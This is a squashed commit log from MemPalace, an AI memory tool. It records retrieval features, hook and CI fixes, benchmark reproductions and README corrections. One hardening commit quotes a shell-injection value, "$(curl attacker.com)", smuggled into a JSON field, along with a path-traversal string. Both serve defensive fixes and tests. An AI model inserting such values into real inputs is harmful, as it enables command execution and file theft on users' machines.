- upsert_closet replaced by upsert_closet_lines: checks each topic
  line individually against CLOSET_CHAR_LIMIT. If adding one line
  WHOLE would exceed the limit, starts a new closet. Never splits
  mid-topic.
- build_closet_lines returns a list of atomic lines (not joined text)
- Richer extraction: section headers, more action verbs, up to 3
  quotes, up to 12 topics per file
- Each line is complete: topic|entities|→drawer_refs

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* docs: add CLOSETS.md — closet layer overview

Cherry-picked the docs portion of 67e4ac6 to accompany the closet
feature. Test coverage for closets is omnibus with tests for entity
metadata and BM25 (see PR targeting those features) and will land
together in a follow-up.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>

* feat: entity metadata + diary ingest + BM25 hybrid search

Three features that close the gap between the architecture docs
and the actual codebase:

1. Entity metadata on drawers and closets
   - _extract_entities_for_metadata() pulls names from known_entities.json
     + proper nouns appearing 2+ times
   - Stamped as "entities" field in ChromaDB metadata
   - Enables filterable search by person/project name

2. Day-based diary ingest (diary_ingest.py)
   - ONE drawer per day, upserted as the day grows
   - Closets pack topics atomically, never split mid-topic
   - Tracks entry count in state file, only processes new entries
   - Usage: python -m mempalace.diary_ingest --dir ~/summaries

3. BM25 hybrid search in searcher.py
   - _bm25_score() keyword matching complements vector similarity
   - _hybrid_rank() combines both signals (60% vector, 40% BM25)
   - Catches exact name/term matches that embeddings miss
   - Applied to both closet-first and direct drawer search paths

689/689 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test: add tests for mine_lock, closets, entity metadata, BM25, diary

Trimmed version of Milla's omnibus test_closets.py to only cover
features present in this PR stack (#784 lock, #788 closets, this
PR's entity/BM25/diary). Strip-noise tests will land with #785;
tunnel tests will land with the tunnels PR.

16/16 pass.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>

* feat: explicit cross-wing tunnels for multi-project agents

Adds active tunnel creation alongside passive tunnel discovery.

Passive tunnels (existing): rooms with the same name across wings.
Explicit tunnels (new): agent-created links between specific
locations. "This API design in project_api relates to the database
schema in project_database."

New functions in palace_graph.py:
- create_tunnel() — link two wing/room pairs with a label
- list_tunnels() — list all explicit tunnels, filter by wing
- delete_tunnel() — remove a tunnel by ID
- follow_tunnels() — from a room, find all connected rooms in
  other wings with drawer content previews

New MCP tools:
- mempalace_create_tunnel
- mempalace_list_tunnels
- mempalace_delete_tunnel
- mempalace_follow_tunnels

Tunnels stored in ~/.mempalace/tunnels.json (persists across
palace rebuilds). Deduplicated by endpoint pair.

689/689 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* test: add TestTunnels for cross-wing tunnel operations

Appended from Milla's omnibus test_closets.py — covers create,
list, delete, dedup, and follow_tunnels behavior. 21/21 pass.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>

* feat(search): drawer-grep returns best-matching chunk + neighbors

When a closet hit leads to a source file with many drawers, grep each
chunk for query terms and return the BEST-MATCHING chunk + 1 neighbor
on each side, instead of dumping the whole file truncated at
MAX_HYDRATION_CHARS. Result now includes drawer_index and
total_drawers so callers can request adjacent drawers explicitly.

Extracted from Milla's commit 935f657 which bundled drawer-grep with
closet_llm (deferred pending LLM_ENDPOINT refactor) and fact_checker
(separate PR). Ported only the searcher.py change.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat: offline fact checker against entity registry + knowledge graph

fact_checker.py verifies text for contradictions against locally stored
entities and KG facts. Catches similar-name confusion (Bob vs Bobby),
relationship mismatches (KG says husband, text says brother), and
stale facts (KG valid_from/valid_to).

No hardcoded facts. No network calls. Reads:
- ~/.mempalace/known_entities.json
- KnowledgeGraph SQLite

Usage:
  from mempalace.fact_checker import check_text
  issues = check_text("Bob is Alice's brother", palace_path)

  # CLI
  python -m mempalace.fact_checker "text" --palace ~/.mempalace/palace

Extracted from Milla's commit 935f657 which bundled this with
closet_llm (deferred) and drawer-grep (PR #791). Ported only
fact_checker.py — verified no network / API imports.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat: optional LLM-based closet regeneration — bring-your-own endpoint

Adds mempalace/closet_llm.py as an OPTIONAL path for richer closet
generation. Regex closets remain the default and cover the local-first
promise; users who want LLM-quality topics can bring their own endpoint.

Configuration (env or CLI flag):
  LLM_ENDPOINT — OpenAI-compatible base URL (required)
  LLM_KEY      — bearer token (optional; local inference skips this)
  LLM_MODEL    — model name (required)

Works with Ollama, vLLM, llama.cpp servers, OpenAI, OpenRouter, and any
other provider that speaks OpenAI-compatible /chat/completions. Zero new
dependencies — uses stdlib urllib.

Replaces the original Anthropic-SDK-hardcoded version of this module
from Milla's branch (commit 935f657). Same prompt, same parsing, same
regenerate_closets flow; only the transport was generalised so the
feature doesn't lock users into a specific vendor or require API keys
for core memory operations (CLAUDE.md, "Local-first, zero API").

Includes 13 unit tests covering config resolution, request shape,
auth-header omission when no key is set, code-fence stripping, and
missing-config error path. All mocked — zero network calls in tests.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>

* fix(search): hybrid closet+drawer retrieval — closets boost, never gate (#795)

* Fix: set cosine distance metadata on all collection creation sites

ChromaDB defaults HNSW index to L2 (Euclidean) distance, but
MemPalace scoring uses 1-distance which requires cosine (range 0-2).
Add metadata={"hnsw:space": "cosine"} to the 4 production and 3 test
call sites that were missing it.

Closes #218

* fix: sync version.py to 3.2.0

Commit 6614b9b bumped pyproject.toml to 3.2.0 but missed
mempalace/version.py, breaking test_version_consistency on
every PR's CI. This syncs them.

* refactor: extract locked filing block to keep mine_convos under C901

Adding the per-file lock + double-checked file_already_mined() in the
previous commit pushed mine_convos cyclomatic complexity from 25 to 26,
just over ruff's max-complexity threshold. Hoist the locked critical
section into _file_chunks_locked() so the outer loop stays within
budget. No behavior change.

* style: ruff format mempalace/palace.py

Add blank lines after inline imports in mine_lock. Pure formatting.

* fix(normalize): make strip_noise verbatim-safe and scope it to Claude Code JSONL

The initial strip_noise() regressed on three fronts when audited against
adversarial user content — each verified with executable repros against
the cherry-picked code:

  1. `<tag>.*?</tag>` with re.DOTALL span-ate across messages: one
     stray unclosed <system-reminder> anywhere in a session merged with
     the next closing tag, silently deleting everything between them
     (including full assistant replies).
  2. `.*\(ctrl\+o to expand\).*\n?` nuked entire lines of user prose
     whenever a user happened to document the TUI shortcut.
  3. `Ran \d+ (?:stop|pre|post)\s*hook.*` with IGNORECASE ate the
     second sentence from "our CI has a stop hook ... Ran 2 stop hooks
     last week" — legitimate user commentary.

These are unambiguous violations of the project's "Verbatim always"
design principle.

Fixes:

- All tag patterns are now line-anchored (`(?m)^(?:> )?<tag>`) and their
  body forbids crossing a blank line (`(?:(?!\n\s*\n)[\s\S])*?`), so a
  dangling open tag cannot eat neighboring messages.
- `_NOISE_LINE_PREFIXES` are line-anchored and case-sensitive — user
  prose mentioning "CURRENT TIME:" mid-sentence is preserved.
- Hook-run chrome requires `(?m)^`, explicit hook names (Stop,
  PreCompact, PreToolUse, etc.), and no IGNORECASE.
- "… +N lines" is line-anchored.
- "(ctrl+o to expand)" only matches Claude Code's actual collapsed-
  output chrome shape `[N tokens] (ctrl+o to expand)`; a bare
  parenthetical in user prose stays intact.

Scope:

- `strip_noise()` is no longer called on every normalization path.
  Only `_try_claude_code_jsonl` invokes it, per-extracted-message — so
  Claude.ai exports, ChatGPT exports, Slack JSON, Codex JSONL, and
  plain text with `>` markers pass through fully verbatim. Per-message
  application also makes span-eating structurally impossible.

Tests:

- 15 new tests in test_normalize.py pin the boundary: 6 guard user
  content that must survive (each of the adversarial repros), 9 assert
  real system chrome is still stripped. All pass; full suite 702 pass
  (2 failures are the unrelated pre-existing version.py bug, cleared
  by #820).

Known limitation (not fixed here): convo_miner.py does not delete
drawers on re-mine, so transcripts mined before this PR keep noise-
filled drawers until the user manually erases + re-mines. Proper fix
needs a schema-version field on drawer metadata + re-mine trigger —
out of scope for this PR.

* feat(normalize): auto-rebuild stale drawers via NORMALIZE_VERSION schema gate

Without this, the strip_noise improvement only helps new mines. Every
user who had already mined Claude Code JSONL sessions would keep their
noise-polluted drawers forever, because convo_miner's file_already_mined
skip short-circuits before re-processing.

Adds a versioned schema gate so upgrades propagate silently:

- palace.NORMALIZE_VERSION=2 — bumped when the normalization pipeline
  changes shape (this PR's strip_noise is the v1→v2 bump).
- file_already_mined now returns False if the stored normalize_version
  is missing or less than current, triggering a rebuild on next mine.
- Both miners stamp drawers with the current normalize_version.
- convo_miner now purges stale drawers before inserting fresh chunks
  (mirrors miner.py's existing delete+insert), extracted into
  _file_convo_chunks helper to keep mine_convos under ruff's C901 limit.

User experience: upgrade mempalace, run `mempalace mine` as usual, old
noisy drawers get silently replaced with clean ones. No erase needed,
no "you need to rebuild" changelog footgun.

Tests:
- test_file_already_mined_returns_false_for_stale_normalize_version —
  pins the version gate contract for missing/v1/current.
- test_add_drawer_stamps_normalize_version — fresh project-miner drawers
  carry the field.
- test_mine_convos_rebuilds_stale_drawers_after_schema_bump — end-to-end
  proof that a pre-v2 palace gets silently cleaned on next mine, with
  orphan drawers purged and NOT skipped.

Existing test_file_already_mined_check_mtime updated to include the
new field; all other tests unaffected.

* fix: stop hooks from making agents write in chat — save tokens

The save hook and precompact hook were telling the agent to write
diary entries, add drawers, and add KG triples IN THE CHAT WINDOW.
Every line written stays in conversation history and retransmits on
every subsequent turn — ~$1/session in wasted tokens.

Fix: hooks now say "saved in background, no action needed" and use
decision: allow instead of block. The agent continues working without
interruption. All filing happens via the background pipeline.

Also updated hooks README with:
- Known limitation: hooks require session restart after install
- Updated cost section: zero tokens, background-only

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: use microsecond timestamp and full content hash in diary entry ID (#819)

* fix: remove unused import 'main' from mempalace/__init__.py

Removed the 'main' import from `mempalace/__init__.py` and updated
`pyproject.toml` to point the script entry point directly to
`mempalace.cli:main`. This ensures the CLI remains functional while
improving code hygiene.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>

* merge: full hardened stack + rewrite fact_checker around actual KG API

Merges the full hardened stack (up through #791 drawer-grep) and turns
fact_checker from "dead code hidden behind bare except" into an
actually-working offline contradiction detector with tests.

## Dead paths the PR body advertised but the code never executed

Both buried by a single outer ``except Exception: pass``:

  * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method;
    it has ``query_entity()``. The attribute error was silently swallowed
    and the entire KG branch always returned ``[]``. Now using
    ``kg.query_entity(subject, direction="outgoing")`` with proper
    handling of the ``predicate``/``object``/``current``/``valid_to``
    fields the real API returns.
  * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only
    kwarg is ``db_path``. Passing ``palace_path`` raised TypeError,
    silently swallowed. Now computing the db_path correctly from
    ``<palace>/knowledge_graph.sqlite3``, matching the convention the
    MCP server already uses.

## Contradiction logic rewritten

The previous ``if kg_pred in claim and fact.object not in claim`` only
fired when text used the SAME predicate word as the KG fact — the exact
opposite of the stated use case ("Bob is Alice's brother" when KG says
husband" would NOT have fired). Replaced with a proper parse → lookup
→ compare pipeline:

  * ``_extract_claims`` parses two surface forms ("X is Y's Z" and
    "X's Z is Y") into ``(subject, predicate, object)`` triples.
  * ``_check_kg_contradictions`` pulls the subject's outgoing facts
    and flags two classes:
      - ``relationship_mismatch`` when a current KG fact matches the
        same ``(subject, object)`` pair but with a different predicate.
      - ``stale_fact`` when the exact triple exists but is
        ``valid_to``-closed in the past.
  * Stale-fact detection is now implemented (the PR body claimed it;
    the old code silently didn't implement it).

## Performance fix — O(n²) → O(mentioned × n)

``_check_entity_confusion`` previously computed Levenshtein for every
pair of registered names on every ``check_text`` call. For 1,000
registered names that's ~500K edit-distance calls per hook invocation.
Now we first identify which registry names actually appear in the text
(single regex scan), then only compute edit distance between mentioned
and unmentioned names. Pinned by a test that asserts <200ms on a 500-
name registry with zero mentions.

Also: when *both* similar names are mentioned in the text, we no
longer flag them — the user clearly knows they're different people.

## Shared entity-registry loader

``mempalace/miner.py`` already had an mtime-cached loader for
``~/.mempalace/known_entities.json``. fact_checker had a duplicate
implementation that leaked file handles and ignored caching. Extended
miner's cache to expose both the flat set (``_load_known_entities``)
and the raw category dict (``_load_known_entities_raw``); fact_checker
now imports the latter. No more double disk reads, no more handle leak.

## Tests — 24 cases in tests/test_fact_checker.py

All three detection paths + both dead-code regressions:
  * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the
    correct KG constructor signature so the ``palace_path=`` bug can't
    come back.
  * ``test_relationship_mismatch_detected`` — the headline example from
    the PR body now actually fires.
  * ``test_stale_fact_detected`` — valid_to-closed triple is flagged.
  * ``test_current_fact_same_triple_is_not_flagged`` — no false positive
    on a still-valid match.
  * ``test_performance_bounded_by_mentioned_names`` — 500-name registry,
    zero mentions, <200ms. Regression for the O(n²) blowup.
  * ``test_no_false_positive_when_both_names_mentioned`` — Mila and
    Milla in the same text is fine.
  * Plus claim extraction, flatten_names shapes, CLI exit code, empty
    text handling, missing-palace graceful fallback, registry-dict
    shape support.

785/785 suite pass. ruff + format clean on CI-pinned 0.4.x.

* Optimize entity detection with regex caching and pre-compilation

- Use functools.lru_cache to cache compiled patterns for entity names.
- Pre-compile static pronoun patterns into a single regex.
- Remove redundant .lower() calls in score_entity loop.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>

* docs: fix stale milla-jovovich org URLs in website and plugin manifests (#787)

Follow-up to #766 which covers version.py, pyproject.toml, README,
CHANGELOG, and CONTRIBUTING. These 11 files still had the old org
name in URLs:

- website/ (VitePress config + 6 docs pages)
- .claude-plugin/ (plugin.json repository, README marketplace command)
- .codex-plugin/ (plugin.json URLs, README links)

Author name fields are intentionally unchanged.

* test: make diary state path assertion platform-neutral

The Windows CI job failed on:

    assert '/.mempalace/state/' in str(state_path)

because Windows uses ``\`` as the path separator, so the substring
never matches. The behavior under test (state file lives outside the
diary dir, under ``~/.mempalace/state/``) is already correct on both
platforms — only the assertion was Unix-only.

Switch to ``state_path.parent`` comparisons that work on any OS.

* test: serialize mine_lock concurrency test with multiprocessing

The macOS CI job failed ``test_lock_blocks_concurrent_access`` because
``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads
in the same process both acquire even when they open their own file
descriptors. The test passed on Linux (per-FD flock) and Windows
(per-FD ``msvcrt.locking``) but was never actually exercising the
lock's real contract.

``mine_lock`` is designed to serialize multi-*agent* access — i.e.,
separate processes, not threads. Switch the test to
``multiprocessing.get_context('spawn')`` with a module-level worker
(so the spawn pickles cleanly) so it:

  1. reflects the actual use case (one lock per mining process);
  2. passes on all three OSes without flock-semantics branching;
  3. catches real regressions (a broken lock would now let both
     processes through, exactly what we care about).

Hold time bumped to 0.3s and the "wait until p1 acquires" delay to
0.2s to tolerate spawn's higher startup latency on macOS/Windows.

* test: verify mine_lock via disjoint critical-section intervals

The previous revision used multiprocessing but still relied on timing
("second process waited at least N seconds") which flakes on CI where
spawn overhead eats into the hold window. Linux CI observed the second
process report a 0.088s wait — below the 0.1s threshold — even though
the lock behavior was correct; spawn was just slow enough that the
first process had nearly finished holding when the second got past
its own spawn.

Switch to effect-based verification: each worker logs its
[enter_time, exit_time] inside the critical section, and the test
asserts the two intervals are disjoint after sorting. A broken lock
would produce overlapping intervals regardless of spawn latency; a
working lock cannot.

Also removed the mp.Queue since we no longer pass timing data back.

* Fix: ruff format with CI-pinned version (0.4.x)

* fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835)

* fix: README audit — match every claim to shipped code + add hall detection

TDD audit: wrote 42 tests verifying README claims against codebase.
Fixed all 7 failures:

1. Tool count: 19 → 29 (10 tools were undocumented)
2. Added tool table rows for tunnels, drawer management, system tools
3. Version badge: 3.1.0 → 3.2.0
4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers"
5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py)
6. pyproject.toml version in project structure: v3.0.0 → v3.2.0
7. Hall detection: added detect_hall() to miner.py — drawers now tagged
   with hall metadata so palace_graph.py can build hall connections

New code:
- miner.py: detect_hall() — keyword scoring against config hall_keywords,
  writes hall field to every drawer's metadata
- tests/test_hall_detection.py — 12 TDD tests (written before code)
- tests/test_readme_claims.py — 42 TDD tests verifying README accuracy

859/859 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: resolve ruff lint — unused imports and variables

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* style: ruff format with CI-pinned 0.4.x

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: use conftest fixtures in hall tests for Windows compat

Windows CI fails with NotADirectoryError when ChromaDB tries to
write HNSW files in short-lived TemporaryDirectory. Use conftest
palace_path and tmp_dir fixtures instead — same pattern as all
other tests that touch ChromaDB.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address Igor's review — convo_miner halls, cached config, markdown typo

TDD: wrote tests for convo_miner hall metadata and config caching
BEFORE verifying the code changes.

1. README markdown typo: extra ** in wake-up token row (line 195)
2. convo_miner.py: added _detect_hall_cached() — conversation
   drawers now get hall metadata (was missing, Igor caught it)
3. miner.py + convo_miner.py: cached hall_keywords at module level
   so config.json isn't re-read per drawer during bulk mine
4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching

861/861 tests pass. ruff clean.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(website): update vitepress base url for custom domain

* chore(release): bump version strings to 3.3.0 and curate CHANGELOG

Prepare develop for the 3.3.0 release cycle.

Version bumps:
- mempalace/version.py: 3.2.0 -> 3.3.0
- pyproject.toml: 3.2.0 -> 3.3.0
- README.md: pyproject.toml label and shields.io badge
- uv.lock: mempalace 3.0.0 -> 3.3.0 (also fills in resolved dev/extras)

CHANGELOG.md:
- Close out the stale [Unreleased] section as [3.2.0] - 2026-04-12
  (v3.2.0 was tagged on that date but the release flip was never made)
- Add a fresh [Unreleased] - v3.3.0 section covering the 49 commits
  since v3.2.0: closet layer, BM25 hybrid search, entity metadata,
  diary ingest, cross-wing tunnels, drawer-grep, offline fact checker,
  LLM-based closet regen, hall detection, cosine-distance fix,
  multi-agent locking, README audit, etc.
- Adopt Keep a Changelog + SemVer framing
- Add version compare reference links at the bottom
- Fix stale milla-jovovich/mempalace preamble URL to MemPalace/mempalace

---------

Co-authored-by: MSL <232237854+milla-jovovich@users.noreply.github.com>
Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: eblander <eblander@foundrydigital.com>
Co-authored-by: shafdev <96260000+shafdev@users.noreply.github.com>
Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com>
Co-authored-by: mvalentsev <michael@valentsev.ru>
Co-authored-by: Dominique Deschatre <43499065+domiscd@users.noreply.github.com>

* ci: serve docs from develop only

Docs deploy to GitHub Pages from develop for faster iteration cycles.
Main was failing the deploy step with "Branch 'main' is not allowed to
deploy to github-pages due to environment protection rules" on every
release merge (v3.2.0, v3.3.0) — noise without signal, since docs
weren't meant to serve from main anyway.

Removes main from both the push trigger and the deploy-job guard.
Develop continues to deploy as before; manual dispatch still works.

* fix(status): paginate metadata fetch to support large palaces

`col.get(limit=total)` causes SQLite "too many SQL variables"
on palaces with >10k drawers (#802) and on older versions the
hardcoded limit=10000 silently truncated the count (#850).

Paginate in 5k batches using offset and aggregate wing/room
counts incrementally. Also use `col.count()` for the header
instead of `len(metas)` so the displayed total is always correct.

Tested on a 122,686-drawer palace.

Fixes #850
Related: #802, #723

* refactor: route all chromadb access through ChromaBackend

Prerequisite for RFC 001 (plugin spec, #743). Removes every direct
`import chromadb` outside the ChromaDB backend itself so the core
modules depend only on the backend abstraction layer.

Extends ChromaBackend with make_client, get_or_create_collection,
delete_collection, create_collection, and backend_version. Adds
update() to the BaseCollection contract. Non-backend callers
(mcp_server, dedup, repair, migrate, cli) now go through the
abstraction; tests patch ChromaBackend instead of chromadb.

With this landed, the RFC 001 spec can be enforced and PalaceStore
(#643) can ship as a plugin without touching core modules.

* fix: update stale org URLs in pyproject.toml and README (#787)

* fix: harden hooks against shell injection, path traversal, and arithmetic injection

save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809

* fix: add logging on rejected transcript paths and platform-native path test

- _count_human_messages() now logs a WARNING via _log() when a
  non-empty transcript_path is rejected by the validator, making
  silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to
  verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: MemPalace/mempalace#809

* Increase visibility of fake website caution

Noticed a URL 
```
hXXps://www.mempalace[.]tech/
```

Though the README currently warns, it is perhaps best to surface it at urgency level at the top of the README.

* fix: use permissive validator for KG entity values (closes #455)

sanitize_name rejects commas, colons, parentheses, and slashes — characters
that commonly appear in knowledge graph subject/object values. Adds
sanitize_kg_value for KG entity fields (subject, object, entity) while
keeping sanitize_name for predicates and wing/room names.

* chore: bump plugin manifests to 3.3.0 and fix owner URL

Aligns marketplace.json and both plugin.json files with version.py /
pyproject.toml (already at 3.3.0) so `/plugin update` reflects the
v3.1.0/v3.2.0/v3.3.0 tags that had been landing without manifest bumps.

Also updates marketplace.json `owner.url` from the stale
github.com/milla-jovovich path to the current github.com/MemPalace org.

Refs #874

* ci: add version guard to catch tag/manifest drift

Fails a tag push if `vX.Y.Z` does not match `mempalace/version.py` (the
single source of truth per CLAUDE.md), and fails PRs that touch any
version file without keeping all five in sync (pyproject.toml,
version.py, .claude-plugin/marketplace.json, .claude-plugin/plugin.json,
.codex-plugin/plugin.json).

Prevents the class of bug described in #874, where v3.1.0/v3.2.0/v3.3.0
tags all landed pointing at commits that still carried manifest version
3.0.14, blocking `/plugin update` for end users.

Refs #874

* ci: let semver pre-release tags bypass strict manifest match

Tags matching `vX.Y.Z-*` (e.g. v3.4.0-rc1, v1.0.0-beta.2) are treated as
internal/staging builds. They skip the tag-vs-manifest check because
pre-releases do not flow to end users via `/plugin update`, which reads
the manifest on the default branch.

Stable tags `vX.Y.Z` still require all five version sources to match
exactly, so the protection against the #874 drift remains intact. The
cross-file consistency check on PRs is unchanged — all manifests must
still agree with mempalace/version.py whenever any version file moves.

* fix: ship CNAME in Pages artifact to pin custom domain

Adds website/public/CNAME containing `mempalaceofficial.com` so the
VitePress build output always includes /CNAME in the Pages artifact.
Without this, the custom-domain setting is only held in the repo's
Pages API config — if it ever drifts (manual edit, org move, workflow
change), the site reverts to <org>.github.io with no record in source.

Note: this does not fix the current site outage. The root cause is DNS
— mempalaceofficial.com has no A/AAAA/CNAME records pointing at GitHub
Pages IPs. That has to be fixed at the registrar. This commit is the
belt-and-suspenders so that once DNS is back, the domain is pinned in
source and the next workflow refactor can't accidentally drop it.

* docs: tighten SECURITY.md with real version policy and GHPVR-only channel

Builds on @Yorji-Porji's draft by fixing three issues before it lands:

- Replace the `< 1.0.0` placeholder table with MemPalace's actual
  support policy: current major (3.x) receives fixes, 2.x and earlier
  do not.
- Remove the `[Insert Maintainer Email Here]` placeholder and the
  email fallback. GitHub Private Vulnerability Reporting is enabled
  on this repo; the policy points there exclusively so there is no
  risk of a researcher emailing a dead address.
- Drop the meta-note ("Adjust the table above…") that was an
  instruction to the maintainer, not policy text.

Structure, triage timelines, and credit language are kept as drafted.

* fix: allow mining directories without local mempalace.yaml

When no mempalace.yaml or mempal.yaml exists in the source directory,
return a default config (wing = directory name, room = general) instead
of calling sys.exit(1). This lets users mine any directory into their
palace without requiring init first.

Closes #14.

* fix: remove unused sys import

* fix: send missing-yaml warning to stderr and flag basename collisions

Addresses review feedback on #604:

- Warning now goes to stderr instead of stdout so it doesn't mix with
  mine progress output when users pipe stdout elsewhere.
- Warning explicitly calls out that directories with the same basename
  will share a wing name, and suggests adding mempalace.yaml to
  disambiguate. Prevents silent content mixing across projects mined
  without yaml.

* docs: name official domain and specific impostors in scam alert

Replace the blanket ban on .tech/.io/.com domains with an allowlist
of real MemPalace surfaces (GitHub repo, PyPI, mempalaceofficial.com)
and call out mempalace.tech as the reported impostor. The blanket
.com ban would have flagged mempalaceofficial.com as fake once DNS
resolves (CNAME shipped in #877).

Also update the April 11 follow-up section to match so the two
notices no longer contradict each other.

* perf: optimize regex compilation in entity extraction

Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>

* feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871)

export MEMPAL_VERBOSE=true  → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written.
Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat: add VSCode devcontainer matching CI environment

Contributors now get a one-click dev environment that mirrors CI exactly:
Python 3.11 (middle of the 3.9/3.11/3.13 matrix), ruff pinned to the same
>=0.4.0,<0.5 range CI enforces, and pre-commit hooks auto-installed from
the existing .pre-commit-config.yaml.

Pinning ruff in post-create.sh is the load-bearing piece: pyproject only
sets a floor, so without the pin the ruff extension would install 0.15.x
and phantom-fail lint against CI's 0.4.x.

* fix: add missing self._lock to query_relationship, timeline, stats in KnowledgeGraph

* fix: replace invalid 'decision: allow' with {} in hooks

Closes #872. The top-level decision field only recognizes "block".
To not block, return empty JSON {}. "allow" was silently ignored
by Claude Code, causing unpredictable behavior.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: add missing self._lock to KnowledgeGraph.close()

TDD: test first, failed, fixed, passed.

Igor fixed query_relationship/timeline/stats in an earlier commit.
close() was the last method touching self._connection without
holding the lock.

Closes #883.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* benchmarks: add --llm-backend ollama for non-Anthropic rerank

The rerank pipeline was hardcoded to Anthropic's /v1/messages.
Add a backend flag so the same code path can be exercised with
any OpenAI-compatible endpoint — local Ollama, Ollama Cloud,
or any gateway that speaks /v1/chat/completions.

Enables independent verification of the "100% with Haiku rerank"
claim by running the full benchmark with a different LLM family
(e.g. minimax-m2.7:cloud) and zero Anthropic dependency.

Both longmemeval_bench.py and locomo_bench.py:
 - llm_rerank*() gain backend= / base_url= kwargs
 - CLI: --llm-backend {anthropic,ollama}, --llm-base-url
 - API key required only when backend=anthropic (diary/palace modes still require it)
 - Parse last integer in response (reasoning models emit multi-int output)
 - Fallback to message.reasoning when content is empty
 - Raise max_tokens to 1024 for reasoning models

* benchmarks: apply ruff-format to llm_rerank (trivial line wrap)

* benchmarks: add v3.3.0 reproduction results + 50/450 split

Addresses #875: every internal BENCHMARKS.md claim reproduced
on Linux x86_64 (v3.3.0 tag, deterministic ChromaDB embeddings,
seed=42 for the LongMemEval dev/held-out split).

Scorecard — all reproduce exactly:

  LongMemEval
    raw R@5                            96.6% (500/500)   ✅
    hybrid_v4 held-out 450 R@5         98.4% (442/450)   ✅
    hybrid_v4 + minimax rerank R@5     99.2% (496/500)   *
    hybrid_v4 + minimax rerank R@10   100.0% (500/500)   *

  LoCoMo (session, top-10)
    raw                                60.3% (1986q)     ✅
    hybrid v5                          88.9% (1986q)     ✅

  ConvoMem all-categories (250 items)   92.9%            ✅
  MemBench all-categories (8500)        80.3%            ✅

* The minimax-m2.7:cloud rerank run replicates the "100%" claim
  with a different LLM family (no Anthropic dependency). R@10 is
  a perfect reproduction; R@5 misses 4 questions that the
  published Haiku run caught — consistent with BENCHMARKS.md's own
  disclosure that hybrid_v4 includes three question-specific fixes
  developed by inspecting misses, i.e. teaching to the test.

The committed 50/450 split is the deterministic (seed=42) split
BENCHMARKS.md references but wasn't previously in the repo.

Full result JSONLs include every question, every retrieved id,
and every score — auditable end-to-end.

* docs: slim README and move corrections/notices to docs/HISTORY.md

Addresses #875. The previous README was 755 lines mixing six purposes
(scam alert, hero, two mea-culpa notes, install guide, architecture
explainer, API reference, file map). Rework it as a pure entry point:
what MemPalace is, how to install, honest benchmark numbers, links to
the website for concept/architecture documentation.

Key content changes:
 - Drop the "highest-scoring AI memory system ever benchmarked" framing.
 - New tagline: "Local-first AI memory. Verbatim storage, pluggable
   backend, 96.6% R@5 raw on LongMemEval — zero API calls." Avoids
   naming a specific vector-store implementation since the backend is
   pluggable (see mempalace/backends/base.py).
 - Remove the cross-system comparison table. Retrieval recall (R@5)
   and end-to-end QA accuracy are different metrics and are not
   comparable; placing MemPalace's R@5 next to competitor QA accuracy
   under a single column header was a category error.
 - The "100%" LongMemEval headline is no longer the lead. The honest
   held-out figure is 98.4% R@5 on 450 unseen questions. The rerank
   pipeline reaches >=99% with any capable LLM (reproduced with
   Claude Haiku, Sonnet, and minimax-m2.7 via Ollama) — pipeline-level,
   not model-specific.
 - Benchmark reproduction commands now reference the correct repo
   (MemPalace/mempalace, not the defunct aya-thekeeper/mempal branch).

New file: docs/HISTORY.md as the canonical home for post-launch
corrections, public notices, and retractions. Contains verbatim:
 - 2026-04-14 note on this rewrite (links to #875)
